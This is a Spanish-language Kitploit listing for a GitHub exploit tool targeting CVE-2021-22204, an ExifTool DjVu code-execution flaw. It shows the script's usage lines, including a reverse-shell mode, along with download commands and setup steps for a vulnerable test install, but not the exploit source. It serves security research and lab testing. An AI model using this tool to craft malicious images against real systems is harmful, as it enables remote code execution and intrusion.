Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit-CVE-2021-22204 — Exploit para CVE-2021-22204 (ExifTool) - Ejecución de Código Arbitrario | Kitploit
Herramientas/GitHubGitHub/unicordev/exploit-cve-2021-22204
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubunicordev/exploit-cve-2021-22204

exploit-CVE-2021-22204

Exploit para CVE-2021-22204 (ExifTool) - Ejecución de Código Arbitrario

Ver Repositorio
536hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Exploit para CVE-2021-22204 (ExifTool) - Ejecución Arbitraria de Código

GitHub CVE Cover

¿Te gusta este repositorio? ¡Dale una ⭐!

Solo con fines educativos y de investigación de seguridad autorizada.

Autor del Exploit

@UNICORDev por (@NicPWNs y @Dev-Yeoj)

Descripción de la Vulnerabilidad

La neutralización incorrecta de datos de usuario en el formato de archivo DjVu en ExifTool versiones 7.44 en adelante permite la ejecución arbitraria de código al analizar la imagen maliciosa.

Descripción del Exploit

Utiliza este exploit para generar un payload de imagen JPEG que puede ser usado con una versión vulnerable de ExifTool para ejecución de código. Se puede proporcionar un comando personalizado o generar una shell inversa. Se genera automáticamente una imagen JPEG y, opcionalmente, se puede suministrar una imagen JPEG personalizada para insertar el payload.

Uso

root@kitploit:~
  python3 exploit-CVE-2021-22204.py -c <comando>
  python3 exploit-CVE-2021-22204.py -s <IP-local> <puerto-local>
  python3 exploit-CVE-2021-22204.py -c <comando> [-i <imagen.jpg>]
  python3 exploit-CVE-2021-22204.py -s <IP-local> <puerto-local> [-i <imagen.jpg>]
  python3 exploit-CVE-2021-22204.py -h

Opciones

root@kitploit:~
  -c    Modo de comando personalizado. Proporciona el comando a ejecutar.
  -s    Modo de shell inversa. Proporciona IP y puerto local.
  -i    Ruta a una imagen JPEG personalizada. (Opcional)
  -h    Muestra este menú de ayuda.

Descarga

Descargar exploit-CVE-2021-22204.py desde GitHub

Descargar exploit-CVE-2021-22204.py desde ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50911

Requisitos del Exploit

  • python3
  • djvulibre-bin
  • exiftool

Demo

Demo Gif

Probado En

Exiftool Versión 12.23

Aplica A

Exiftool Versiones 7.44 - 12.23

Entorno Vulnerable

root@kitploit:~
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver

Probar el Payload Generado

root@kitploit:~
exiftool image.jpg

Créditos

  • https://hackerone.com/reports/1154542
  • https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
  • https://nvd.nist.gov/vuln/detail/CVE-2021-22204
  • https://app.hackthebox.com/machines/Overflow
  • https://www.exploit-db.com/exploits/50911
Descargar herramienta